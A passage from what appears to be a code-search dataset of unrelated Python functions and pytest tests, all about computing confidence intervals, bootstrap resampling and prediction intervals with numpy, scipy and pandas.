int,\n alpha: float,\n ci_sides: int,\n bias_correction: bool = False,\n studentized: bool = False,\n seed: int = None):\n assert isinstance(data, np.ndarray)\n assert isinstance(num_reps, int) and num_reps > 0\n assert ci_sides == 1 or ci_sides == 2\n\n # Compute the statistic of interest based on the empirical distribution (input data)\n stat_emp = stat_fcn(data)\n\n # Get the bootstrap replications\n if data.ndim == 1:\n # Size of the samples drawn by the bootstrap method have to be equal input sample, since the variance of the\n # statistic to be computed depends on sample size\n size_sample = data.shape[0]\n # Set the seed if provided\n if seed is not None:\n np.random.seed(seed)\n # Draw samples of data with replacement (uniform weights)\n data_bs = np.random.choice(data, (size_sample, num_reps), replace=True)\n else:\n # Only use this function for 1D data sets\n raise NotImplementedError\n\n # Compute the statistic of interest based on the resampled distribution\n # Do it along each row (axis=0) -->> bootstrap replications\n stat_bs = np.apply_along_axis(stat_fcn, 0, data_bs) # dim = 1 x num_reps\n\n # Correct for the bias introduced by bootstrapping\n # Note: other estimates of the bias-correction factor than stat_emt possible, see [4]\n if bias_correction:\n # bias-corrected statistic (see (2) in [2], or (11.10) in [3])\n stat_bs_bc = 2*stat_emp - np.mean(stat_bs) # same as bias = mean_repl - stat_emp; repl_bc = stat_emp - bias\n stat_ret = stat_bs_bc # use the correction also for the bs replications? -->> No (so far)\n # Note: bias-correction can be dangerous in practice. Even though T_bc(D) is less biased than T(D),\n # the bias-corrected estimator may have substantially larger variance. This is due to a possibly higher\n # variability in the estimate of the bias, particularly when computed from small data sets.\n else:\n # Return the estimator based on the original sample a.k.a. empirical distribution\n stat_ret = stat_emp\n\n # Compute the deviation to the value of the statistic based on the empirical distribution (see [7])\n # This is analogous to the deviation of the empirical value around the true population value\n # i.e. delta = stat_emp - stat_pop\n # Note: it makes no difference if one uses the percentile operator before or after this difference\n delta_bs = stat_bs - stat_emp # dim = 1 x num_reps\n\n # Confidence interval with asymptotic refinement (a.k.a. percentile-t method)\n if studentized:\n # Compute the standard deviation of the original sample\n se_emp = np.std(data, ddof=0)/np.sqrt(data.shape[0]) # for dividing by (n-1) set ddof=1\n if se_emp < 1e-9:\n warn('Standard deviation in the empirical data (se_emp) is below 1e-9.', UserWarning)\n\n # Compute the standard error of the replications for the bootstrapped t-statistic\n se_bs = np.std(stat_bs, ddof=0)/np.sqrt(data_bs.shape[0]) # dim = num_reps x 1\n if se_bs < 1e-9: # use any for version 2 above\n warn('Standard deviation in the bootstrapped data (se_bs) is below 1e-9. '\n 'Setting confidence interval bounds to infinity.', UserWarning)\n return stat_ret, [-np.infty, np.infty]\n\n # Compute the t-statistic of the replications\n t_bs = delta_bs/se_bs # is consistent with [3, p. 360]\n\n if ci_sides == 2: # Two-sided confidence interval\n t_bs.sort()\n t_lo, t_up = np.percentile(t_bs, [100*alpha/2., 100 - 100*alpha/2.])\n ci_lo = stat_emp - t_up*se_emp # see [3, (11.6) p. 364]\n ci_up = stat_emp - t_lo*se_emp # see [3, (11.6) p. 364]\n\n elif ci_sides == 1: # One-sided confidence interval (upper bound)\n t_bs.sort()\n t_lo = np.percentile(t_bs, 100*alpha)\n ci_lo = -np.inf\n ci_up = stat_emp - t_lo*se_emp # see [3, (11.6) p. 364]\n\n else:\n raise pyrado.ValueErr(given=ci_sides, eq_constraint=\"1 or 2\")\n\n # Confidence interval without asymptotic refinement (a.k.a. basic method)\n else:\n if ci_sides == 2: # Two-sided confidence interval\n delta_bs.sort()\n delta_lo, delta_up = np.percentile(delta_bs, [100*alpha/2., 100 - 100*alpha/2.])\n ci_lo = stat_emp - delta_up\n ci_up = stat_emp - delta_lo\n\n elif ci_sides == 1: # One-sided confidence interval (upper bound)\n delta_bs.sort()\n delta_lo = np.percentile(delta_bs, 100*alpha)\n ci_lo = -np.inf\n ci_up = stat_emp - delta_lo\n\n else:\n raise pyrado.ValueErr(given=ci_sides, eq_constraint=\"1 or 2\")\n\n return stat_ret, [ci_lo, ci_up]", "def test_conf_interval_normal_method_with_bounds(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n # ``quantile_estimation_method = \"normal_fit\"``\n # with enforced lower limit (``min_admissible_value``)\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=5,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=290.0,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (290.0, 290.25, 292.54, 292.9), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (290.0, 290.0, 290.0, 290.0), (\n \"quantiles are incorrect\")", "def test_conf_interval_normal_method_no_small_sample_calc(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n # ``quantile_estimation_method = \"normal_fit\"``;\n # with no small sample size calculation\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=None,\n small_sample_size_method=None,\n small_sample_size_quantile=None,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (289.9, 290.25, 292.54, 292.9), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.64, -5.26, -2.86, -2.49), (\n \"quantiles are incorrect\")", "def get_ci_sigma_unknown(p_data, p_alpha):\n\n # -- -------------------------------------------\n # Gather the core statistic values\n sample_mean = np.mean(p_data)\n sample_std = np.std(p_data, ddof=1) # using ddof=1 for sample std\n sample_size = len(p_data)\n\n df = sample_size - 1\n # -- -------------------------------------------\n\n\n # -- -------------------------------------------\n # Get the standard error of the mean \n sem = get_sem(\n p_provided_std = sample_std,\n p_sample_size = sample_size\n )\n # -- -------------------------------------------\n\n\n # -- ------------------------------------------- \n # Calculate the Margin of Error and Confidence Interval\n _, upper_critical_value = get_two_tailed_critical_values(p_alpha = p_alpha)\n\n upper_critical_t = stats.t.ppf(upper_critical_value, df)\n\n # Get the margin of error:\n moe = upper_critical_t * sem\n\n # Calculate the confidence interval:\n ci = np.array([sample_mean - moe, sample_mean + moe])\n # -- -------------------------------------------\n\n\n # -- -------------------------------------------\n Result = namedtuple('Result', 'sample_mean sample_std sample_size alpha sem confidence_level_pct critical_t_statistic margin_of_error confidence_interval')\n\n result = Result(\n sample_mean,\n sample_std,\n sample_size,\n p_alpha,\n sem,\n upper_critical_value * 100,\n upper_critical_t,\n moe,\n ci\n )\n\n return result\n # -- -------------------------------------------", "def ci_mean_std_unknown(array, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n # mean of the sample\n mean = np.mean(array)\n # standard deviation\n std = np.std(array)\n # size of the sample\n n = len(array)\n # degrees of freedom\n df = n - 1\n # calculate the standard error\n std_error = std / np.sqrt(n)\n # find the t critical value\n t_star = np.round(stats.t.ppf(1 - alpha / 2, df), 3)\n # margin of error\n margin_of_error = np.round(t_star * std_error, 2)\n # calculate the lower and upper confidence bounds\n lcb = np.round(mean - margin_of_error, 2)\n ucb = np.round(mean + margin_of_error, 2)\n\n print(\"Margin Of Error: {}\".format(margin_of_error))\n print(\n \"{}% Confidence Interval for Population Mean: ({},{})\".format(\n conf_level, lcb, ucb\n )\n )", "def confidence_interval(data, control_label=None, *args, **kwargs):\n def fn(control, test):\n c_means = CompareMeans(DescrStatsW(test), DescrStatsW(control))\n if _is_proportion(control, test):\n return c_means.zconfint_diff()\n else:\n return c_means.tconfint_diff()\n\n return _apply(data, fn, control_label)", "def test_confidence_intervals(self):\n # Taken from a T-Test table\n\n # Two Tailed\n p, ci = _p_value_and_confidence_intervals(2.228, 10, 'two')\n\n self.assertAlmostEqual(p, .05, delta = .001)\n self.assertTrue(ci.shape == (2, ))\n np.testing.assert_allclose(ci, [-2.228, 2.228], atol=.001)\n\n # Left One-Tailed\n p, ci = _p_value_and_confidence_intervals(1.895, 7, 'left')\n\n self.assertAlmostEqual(p, .05, delta = .001)\n self.assertTrue(ci.shape == (2, ))\n self.assertTrue(np.isinf(ci[0]))\n np.testing.assert_allclose(ci, [-np.inf, 1.895], atol=.001)\n\n # Right One-Tailed\n p, ci = _p_value_and_confidence_intervals(1.761, 14, 'right')\n\n self.assertAlmostEqual(1-p, .05, delta = .001)\n self.assertTrue(ci.shape == (2, ))\n self.assertTrue(np.isinf(ci[1])) \n np.testing.assert_allclose(ci, [-1.761, np.inf], atol=.001)", "def ci_diff_mean_std_unknown(array1, array2, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n\n # means of samples\n mean1 = np.mean(array1)\n mean2 = np.mean(array2)\n\n # standard deviation fo samples\n std1 = np.std(array1)\n std2 = np.std(array2)\n\n # size of the samples\n n1 = len(array1)\n n2 = len(array2)\n\n # difference of the two means\n diff_mean = mean1 - mean2\n\n # degrees of freddom\n deg_fred = deg_fred_two_means(std1, std2, n1, n2)\n\n # find the t critical value\n t_star = np.round(stats.t.ppf(1 - alpha / 2, deg_fred), 3)\n\n # margin of error\n margin_of_error = t_star * np.sqrt((std1 ** 2 / n1) + (std2 ** 2 / n2))\n\n # upper and lower confidence bounds\n lcb = np.round(diff_mean - margin_of_error, 2)\n ucb = np.round(diff_mean + margin_of_error, 2)\n\n print(\n \"{}% Confidence Interval for difference of two population means: ({},{})\".format(\n conf_level, lcb, ucb\n )\n )", "def _nelson_aalen_ci(estimate, variance, conf_type, conf_level):\n # Standard normal quantile for normal approximation confidence intervals\n quantile = st.norm.ppf((1 - conf_level) / 2)\n\n # Compute confidence intervals at the observed event times\n if conf_type == \"linear\":\n error = quantile * np.sqrt(variance)\n lower = estimate + error\n upper = estimate - error\n elif conf_type == \"log\":\n error = np.exp(quantile * np.sqrt(variance) / estimate)\n lower = estimate * error\n upper = estimate / error\n else:\n # This should not be reachable\n raise RuntimeError(f\"Invalid confidence interval type: {conf_type}.\")\n\n # Force confidence interval lower bound to be 0\n lower = np.maximum(lower, 0.)\n\n return lower, upper", "def calculate_ci(data, ci_level=0.99):\n\n # remove NaNs\n ys = data.dropna().values\n\n # calculate CI\n n = len(ys)\n std_err = sem(ys)\n h = std_err * t.ppf((1 + ci_level) / 2, n - 1)\n\n return h", "def residual_bootstrap(self, X: np.ndarray, y: np.ndarray, n=None, B=1000, model=None):\n # fit the model if it hasn't been run\n if model.run is False:\n model.fit(X, y);\n resid = model.residuals\n pred = model.predictions\n boot_est = [None] * B\n result = {} # to store the mean, std_err\n index = 0 \n for _ in range(B):\n idx = np.random.randint(low=0, high=n, size=n)\n boot_yi = pred + resid[idx]\n model.fit(X, boot_yi)\n boot_est[index] = tuple(model.theta)\n index += 1\n \n #self.boot_est['std_err'] = np.std(statistic, ddof=1, axis=0)\n result['estimates'] = boot_est\n result['est_mean'] = np.mean(boot_est, axis=0)\n result['est_err'] = np.std(boot_est, ddof=1, axis=0)\n return result", "def bootstrap_errors(self, arr, k=100):\n val = np.zeros(k)\n\n for i in range(k):\n rand_selection = np.random.choice(arr, len(arr))\n val[i] = self.varience(rand_selection)\n sigma = np.sqrt(np.average(np.square(val))\n - np.square(np.average(val)))\n return sigma", "def _bootstrap_ci_from_std(index, bootstrap_metric_std, test_metric, bottom_col, top_col, alpha=0.95):\n\n assert len(bootstrap_metric_std) == len(test_metric)\n\n df_res = pd.DataFrame(index=index)\n\n print('Calculating bootstrap CIs')\n\n result = np.empty((len(bootstrap_metric_std), 2))\n for i in tqdm(range(len(bootstrap_metric_std))):\n if pd.isna(test_metric[i]):\n result[i, :] = [np.NAN, np.NAN]\n\n result[i, :] = st.norm.interval(alpha, loc=test_metric[i], scale=bootstrap_metric_std[i])\n\n df_res[[bottom_col, top_col]] = result\n\n return df_res", "def state_confidences(self, X: List[np.ndarray], **kwargs) -> List[np.ndarray]:", "def bootstrap(data, iterations=10000):\n\n boot_mean = []\n\n for n in range(0, iterations):\n\n boot = resample(data, replace=True, n_samples=None,\n random_state=None)\n\n boot_mean.append(np.mean(boot))\n\n final_mean = np.mean(boot_mean)\n\n final_std = np.std(boot_mean, dtype=np.float64)\n\n return final_mean, final_std", "def test_conf_interval_normal_method_fallback(data):\n df = data[\"df\"]\n df = df.sample(n=10)\n new_df = data[\"new_df\"]\n\n # ``quantile_estimation_method = \"normal_fit\"``\n # fallback expected for all slices as df is small (10)\n # and ``sample_size_thresh`` is large (20)\n with pytest.warns(Warning):\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=20,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"x\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (290.31, 290.57, 292.23, 292.49), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.15, -4.89, -3.23, -2.97), (\n \"quantiles are incorrect\")", "def bootstrap_binom_err(k, n, CL=[0.025, 0.975], B=10000, type='percentile'):\n phat = k/n\n\n # Special case must be treated separately\n if k == 0:\n lower = 0\n upper = 1 - (1-CL[1])**(1/n)\n\n # Special case must be treated separately\n elif k == n:\n lower = CL[0]**(1/n)\n upper = 1\n\n # Normal\n else:\n bs = bootstrap_sample_binomial(k=k, n=n, B=B)\n if type == 'percentile':\n lower = np.percentile(bs, CL[0]*100, interpolation='lower') / n\n upper = np.percentile(bs, CL[1]*100, interpolation='higher') / n\n elif type == 'basic':\n lower = 2*phat - np.percentile(bs, CL[1]*100, interpolation='higher') / n\n upper = 2*phat - np.percentile(bs, CL[0]*100, interpolation='lower') / n\n else:\n raise Exception(f'bootstrap_binom_err: unknown bootstrap type = {type}')\n\n return np.array([lower, upper])", "def cal_thresh(pred_prob,labels):\n mu_stds = []\n for i in range(19):\n pos_mu, pos_std = fit(pred_prob[labels==i, i])\n mu_stds.append([pos_mu, pos_std])\n return mu_stds", "def test_conf_interval_normal_method_multivar_conditionals(data):\n df = data[\"df\"]\n new_df = data[\"new_df\"]\n # ``quantile_estimation_method = \"normal_fit\"``\n # with multi-variate ``conditional_cols``\n ci_model = conf_interval(\n df=df,\n value_col=\"y\",\n residual_col=\"residual\",\n conditional_cols=[\"x\", \"z_categ\"],\n quantiles=[0.005, 0.025, 0.975, 0.995],\n quantile_estimation_method=\"normal_fit\",\n sample_size_thresh=5,\n small_sample_size_method=\"std_quantiles\",\n small_sample_size_quantile=0.95,\n min_admissible_value=None,\n max_admissible_value=None)\n\n pred_df = predict_ci(\n new_df,\n ci_model)\n assert list(pred_df.columns) == [\"x\", \"z_categ\", \"y_quantile_summary\", ERR_STD_COL], (\n \"pred_df does not have the expected column names\")\n pred_df[\"y_quantile_summary\"] = pred_df[\"y_quantile_summary\"].apply(\n lambda x: tuple(round(e, 2) for e in x))\n assert pred_df[\"y_quantile_summary\"].values[5] == (289.9, 290.26, 292.54, 292.9), (\n \"quantiles are incorrect\")\n assert pred_df[\"y_quantile_summary\"].values[11] == (-5.15, -4.89, -3.23, -2.97), (\n \"quantiles are incorrect\")", "def ci_diff_mean_std_known(array1, array2, std1, std2, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n\n # means of samples\n mean1 = np.mean(array1)\n mean2 = np.mean(array2)\n\n # size of the samples\n n1 = len(array1)\n n2 = len(array2)\n\n # difference of the two means\n diff_mean = mean1 - mean2\n\n # the z critical value\n z_star = np.round(stats.norm.ppf(1 - alpha / 2), 3)\n\n # margin of error\n margin_of_error = z_star * np.sqrt((std1 ** 2 / n1) + (std2 ** 2 / n2))\n\n # upper and lower confidence bounds\n lcb = np.round(diff_mean - margin_of_error, 2)\n ucb = np.round(diff_mean + margin_of_error, 2)\n\n print(\n \"{}% Confidence Interval for difference of two population means: ({},{})\".format(\n conf_level, lcb, ucb\n )\n )", "def bootstrap(init_file, nbootstraps):\n check_presence_init(init_file)\n dict_ = read(init_file)\n\n # Process the information specified in the initialization file\n nbins, logit, bandwidth, gridsize, a, b = process_user_input(dict_)\n trim, rbandwidth, reestimate_p = process_default_input(dict_)\n\n # Suppress output\n show_output = False\n\n # Prepare empty array to store output values\n mte_boot = np.zeros([gridsize, nbootstraps])\n\n # Load the baseline data\n data = read_data(dict_[\"ESTIMATION\"][\"file\"])\n\n counter = 0\n while counter < nbootstraps:\n boot_data = resample(data, replace=True, n_samples=len(data), random_state=None)\n\n # Process the inputs for the decision equation\n indicator, D, Z = process_choice_data(dict_, boot_data)\n\n # Estimate propensity score P(z)\n ps = estimate_treatment_propensity(D, Z, logit, show_output)\n\n if isinstance(ps, np.ndarray): # & (np.min(ps) <= 0.3) & (np.max(ps) >= 0.7):\n # Define common support and trim the data, if trim=True\n boot_data, ps = trim_support(\n dict_,\n boot_data,\n logit,\n ps,\n indicator,\n nbins,\n trim,\n reestimate_p,\n show_output,\n )\n\n # Estimate the observed and unobserved component of the MTE\n X, b1_b0, b0, mte_u = mte_components(\n dict_, boot_data, ps, rbandwidth, bandwidth, gridsize, a, b, show_output\n )\n\n # Calculate the MTE component that depends on X\n mte_x = np.dot(X, b1_b0).mean(axis=0)\n\n # Put the MTE together\n mte = mte_x + mte_u\n mte_boot[:, counter] = mte\n\n counter += 1\n\n else:\n continue\n\n return mte_boot", "def non_param_unpaired_ci(sample1, sample2, alpha=0.05):\n n1 = len(sample1)\n n2 = len(sample2)\n N = norm.ppf(1 - alpha/2)\n diffs = sorted([i-j for i in sample1 for j in sample2])\n k = np.math.ceil(n1*n2/2 - (N * (n1*n2*(n1+n2+1)/12)**0.5))\n CI = (round(diffs[k-1], 3), round(diffs[len(diffs)-k], 3))\n return CI", "def t_confidence_Interval_Difference_Of_Means(xSamples, ySamples, confidence):\n try:\n if len(xSamples) >= 30 or len(ySamples) >= 30:\n raise sampleSizeError(\"Should use normal distribution instead. m or n > 30.\")\n \n if confidence > 1:\n confidence = confidence / 100.0\n print(f\"Converting confidence interval to {confidence}\")\n\n elif type(confidence) != int or type(confidence) != float:\n raise ValueError(\"Confidence Interval must be a numeric value\")\n \n # Find mean and variance for both sample distributions\n n = len(xSamples) \n xBar = sample_mean(xSamples)\n xSampStd = sample_variance(xSamples) ** .5\n \n m = len(ySamples)\n yBar = sample_mean(ySamples)\n ySampStd = sample_variance(ySamples) ** .5\n \n # Find t at alpha/2 and the new distribution's sample size - 2\n # Calculate the sample pooling standard deviation\n tAlpha = (1 + confidence) / 2.0\n t = scipy.stats.t.ppf(tAlpha, (m + n - 2)) \n spsd = ((((n - 1)* (xSampStd**2)) + ((m - 1) * (ySampStd**2)))/(m + n - 2)) ** .5 \n \n # Find the lower and upper bound \n # (X-Y) (+/-) t((spsd * (((1/m)+(1/n)) **.5))\n lowerBound = (xBar - yBar) - t * (spsd * (((1/m)+(1/n)) **.5))\n upperBound = (xBar - yBar) + t * (spsd * (((1/m)+(1/n)) **.5))\n \n return lowerBound, upperBound\n \n except sampleSizeError as inst:\n print(inst.args[0])\n \n except ValueError as inst:\n print(inst.args[0])", "def computeCI(cov, mean):\n mult = 2\n sd = np.diag(cov)**(0.5)\n lower = mean - (mult*sd).reshape(-1,1)\n upper = mean + (mult*sd).reshape(-1,1)\n return lower, upper", "def get_ci(cls, data: tuple or list, cl=0.95,\n is_population=False, tail=\"two\") -> tuple:\n cls._data_validation(data)\n mean = cls.get_mean(data)\n e = cls.get_moe(\n data, cl=cl, is_population=is_population, tail=tail\n )\n return mean - e, mean + e", "def conf(self, success, total):\n try:\n sp = success / total\n conf = binom_conf_interval(success, total, interval='jeffreys')\n uperr = conf[1] - sp # 1 sigma confidence above mean\n loerr = sp - conf[0] # 1 sigma confidence below mean\n return sp, uperr, loerr, 0.5*(uperr+loerr)\n except ValueError as e:\n return 0, 0, 0, 0", "def ci_mean_std_known(array, std, conf_level=95):\n # calculate significance level\n alpha = np.round((1 - conf_level / 100), 2)\n mean = np.mean(array)\n n = len(array)\n # calculate standard error\n std_error = std / np.sqrt(n)\n # find z critical value\n z_star = np.round(stats.norm.ppf(1 - alpha / 2), 3)\n # margin of error\n margin_of_error = np.round(z_star * std_error, 2)\n\n # calculate the lower and upper confidence bounds\n lcb = np.round(mean - margin_of_error, 2)\n ucb = np.round(mean + margin_of_error, 2)\n\n print(\"Margin Of Error: {}\".format(margin_of_error))\n print(\n \"{}% Confidence Interval for Population Mean: ({}, {})\".format(\n conf_level, lcb, ucb\n )\n )", "def eg_bootmu():\n\n a = []\n b = []\n\n for _ in range(100):\n a.append(utils.gaussian(10, 1))\n\n print(\"\", \"mu\", \"sd\", \"cliffs\", \"boot\", \"both\", sep=\"\\t\")\n print(\"\", \"--\", \"--\", \"------\", \"----\", \"----\", sep=\"\\t\")\n\n for mu in range(100, 111):\n b = []\n\n for _ in range(100):\n b.append(utils.gaussian(mu / 10, 1))\n\n cl = utils.cliffsDelta(a, b)\n bs = stats.bootstrap(a, b)\n\n print(\"\", mu / 10, 1, cl, bs, cl and bs, sep=\"\\t\")", "def estimates_conf(self):\n return self._est_L, self._est_R", "def bootstrap(init_file, nbootstraps, show_output=False):\n check_presence_init(init_file)\n dict_ = read(init_file)\n\n nbins = dict_[\"ESTIMATION\"][\"nbins\"]\n trim = dict_[\"ESTIMATION\"][\"trim_support\"]\n rbandwidth = dict_[\"ESTIMATION\"][\"rbandwidth\"]\n bandwidth = dict_[\"ESTIMATION\"][\"bandwidth\"]\n gridsize = dict_[\"ESTIMATION\"][\"gridsize\"]\n a = dict_[\"ESTIMATION\"][\"ps_range\"][0]\n b = dict_[\"ESTIMATION\"][\"ps_range\"][1]\n\n logit = dict_[\"ESTIMATION\"][\"logit\"]\n\n # Distribute initialization information.\n data = read_data(dict_[\"ESTIMATION\"][\"file\"])\n\n # Prepare empty arrays to store output values\n mte_boot = np.zeros([gridsize, nbootstraps])\n\n counter = 0\n while counter < nbootstraps:\n boot = resample(data, replace=True, n_samples=len(data), random_state=None)\n\n # Process data for the semiparametric estimation.\n indicator = dict_[\"ESTIMATION\"][\"indicator\"]\n D = boot[indicator].values\n Z = boot[dict_[\"CHOICE\"][\"order\"]]\n\n # The Local Instrumental Variables (LIV) approach\n\n # 1. Estimate propensity score P(z)\n ps = estimate_treatment_propensity(D, Z, logit, show_output)\n\n if isinstance(ps, np.ndarray): # & (np.min(ps) <= 0.3) & (np.max(ps) >= 0.7):\n\n # 2a. Find common support\n treated, untreated, common_support = define_common_support(\n ps, indicator, boot, nbins, show_output\n )\n\n # 2b. Trim the data\n if trim is True:\n boot, ps = trim_data(ps, common_support, boot)\n\n # 3. Double Residual Regression\n # Sort data by ps\n boot = boot.sort_values(by=\"ps\", ascending=True)\n ps = np.sort(ps)\n\n X = boot[dict_[\"TREATED\"][\"order\"]]\n Xp = construct_Xp(X, ps)\n Y = boot[[dict_[\"ESTIMATION\"][\"dependent\"]]]\n\n b0, b1_b0 = double_residual_reg(ps, X, Xp, Y, rbandwidth, show_output)\n\n # Turn the X, Xp, and Y DataFrames into np.ndarrays\n X_arr = np.array(X)\n Xp_arr = np.array(Xp)\n Y_arr = np.array(Y).ravel()\n\n # 4. Compute the unobserved part of Y\n Y_tilde = Y_arr - np.dot(X_arr, b0) - np.dot(Xp_arr, b1_b0)\n\n # 5. Estimate mte_u, the unobserved component of the MTE,\n # through a locally quadratic regression\n quantiles, mte_u = locpoly(ps, Y_tilde, 1, 2, bandwidth, gridsize, a, b)\n\n # 6. construct MTE\n # Calculate the MTE component that depends on X\n mte_x = np.dot(X, b1_b0).mean(axis=0)\n\n # Put the MTE together\n mte = mte_x + mte_u\n\n mte_boot[:, counter] = mte\n\n counter += 1\n\n else:\n continue\n\n return mte_boot", "def get_conf_interval_from_sample(n, mean, sigma, alpha = 0.95) :\n df = n-1\n scale = sigma / np.sqrt(n)\n return stats.t.interval(alpha=alpha, df=df, loc=mean, scale=scale)", "def test_predict_ci():\n df = pd.DataFrame(dict(x=[1.0, 2.0, 3.0, 4.0]))\n\n class Model(Poisson):\n dv = \"y\"\n features = dict(x=dict(transformer=lambda x: x.x, prior=dist.Normal(0, 1)))\n\n # ci = yhat when no variation in samples\n config = {\"samples\": {\"x\": onp.ones((2, 10))}}\n model = Model.from_dict(config)\n pred = model.predict(df, ci=True).round(5).astype(\"float32\")\n assert pred.y.equals(pred.ci_lower)\n assert pred.y.equals(pred.ci_upper)\n\n # lower < yhat < upper when some variation in samples\n config = {\"samples\": {\"x\": onp.random.normal(size=(2, 100)) * 0.1}}\n model = Model.from_dict(config)\n pred = model.predict(df, ci=True)\n assert (pred.y > pred.ci_lower).all()\n assert (pred.y < pred.ci_upper).all()", "def a_test2_predict_is_intervals_bbvi():\n model = ARIMAX(formula=\"y ~ x1 + x2\", data=data, ar=2, ma=2, family=Exponential())\n x = model.fit('BBVI', iterations=100)\n predictions = model.predict_is(h=10, intervals=True)\n assert(np.all(predictions['99% Prediction Interval'].values >= predictions['95% Prediction Interval'].values))\n assert(np.all(predictions['95% Prediction Interval'].values >= predictions['5% Prediction Interval'].values))\n assert(np.all(predictions['5% Prediction Interval'].values >= predictions['1% Prediction Interval'].values))", "def a_test2_predict_intervals_bbvi():\n model = ARIMAX(formula=\"y ~ x1 + x2\", data=data, ar=2, ma=2, family=Exponential())\n x = model.fit('BBVI', iterations=100)\n predictions = model.predict(h=10, oos_data=data_oos, intervals=True)\n\n assert(np.all(predictions['99% Prediction Interval'].values >= predictions['95% Prediction Interval'].values))\n assert(np.all(predictions['95% Prediction Interval'].values >= predictions['5% Prediction Interval'].values))\n assert(np.all(predictions['5% Prediction Interval'].values >= predictions['1% Prediction Interval'].values))", "def compute_bootstrapped_diff(x0, x1, is_paired, effect_size,\n resamples=5000, random_seed=12345):\n \n from . import effsize as __es\n import numpy as np\n from numpy.random import PCG64, RandomState\n \n # rng = RandomState(default_rng(random_seed))\n rng = RandomState(PCG64(random_seed))\n\n out = np.repeat(np.nan, resamples)\n x0_len = len(x0)\n x1_len = len(x1)\n \n for i in range(int(resamples)):\n \n if is_paired:\n if x0_len != x1_len:\n raise ValueError(\"The two arrays do not have the same length.\")\n random_idx = rng.choice(x0_len, x0_len, replace=True)\n x0_sample = x0[random_idx]\n x1_sample = x1[random_idx]\n else:\n x0_sample = rng.choice(x0, x0_len, replace=True)\n x1_sample = rng.choice(x1, x1_len, replace=True)\n \n out[i] = __es.two_group_difference(x0_sample, x1_sample,\n is_paired, effect_size)\n \n # check whether there are any infinities in the bootstrap,\n # which likely indicates the sample sizes are too small as\n # the computation of Cohen's d and Hedges' g necessitated \n # a division by zero.\n # Added in v0.2.6.\n \n # num_infinities = len(out[np.isinf(out)])\n # print(num_infinities)\n # if num_infinities > 0:\n # warn_msg = \"There are {} bootstraps that are not defined. \"\\\n # \"This is likely due to smaple sample sizes. \"\\\n # \"The values in a bootstrap for a group will be more likely \"\\\n # \"to be all equal, with a resulting variance of zero. \"\\\n # \"The computation of Cohen's d and Hedges' g will therefore \"\\\n # \"involved a division by zero. \"\n # warnings.warn(warn_msg.format(num_infinities), category=\"UserWarning\")\n \n return out", "def standard_bootstrap(dataset):\n randseed=np.random.randint(0,10000)\n np.random.seed(randseed)\n \n n = dataset.shape[0]\n b = np.random.randint(0, high=n-1, size=n)\n return dataset[b]", "def bootstrap(x, iter=int(1E6), return_samples=False):\n\n \n means = np.empty(iter) \n dfs = []\n for i in tqdm(range(iter), desc='Performing bootstrap sampling'):\n resamp = np.random.choice(x, size=len(x), replace=True)\n means[i] = resamp.mean()\n\n if return_samples:\n _df = pd.DataFrame([])\n _df['value'] = resamp\n _df['iter'] = i + 1\n dfs.append(_df)\n\n # Compute confidence intervals of the means.\n mean_val = means.mean()\n bounds_ci = {'99%': (0.5, 99.5), '95%': (2.5, 97.5), '90%': (5, 95),\n '75%': (12.5, 87.5), '50%': (25, 75), '25%': (37.5, 62.5),\n '10%': (45, 55), '5%': (47.5, 52.5), '1%': (49.5, 50.5)} \n cis = {} \n for k, v in bounds_ci.items():\n bounds = np.percentile(means, v)\n cis[k] = bounds\n\n statistics['original_data'] = x\n statistics['resampled_means'] = means\n statistics['mean_value'] = mean_val\n statistics['confidence_intervals'] = cis\n\n if return_samples:\n _df = pd.concat(dfs, sort=False)\n return [statistics, _df]\n else:\n return statistics", "def get_ci(self, ci_percent, test_type='t-test'):\n prop_cut = (1 - ci_percent) / 2\n if test_type == 'bootstrap':\n perf = self.evaluations\n while len(perf.shape) > 2:\n perf = np.nanmean(perf, axis=-1)\n framed_evals = np.concatenate(\n (np.tile(np.array(([-np.inf], [np.inf])),\n (1, self.n_model)),\n perf),\n axis=0)\n ci = 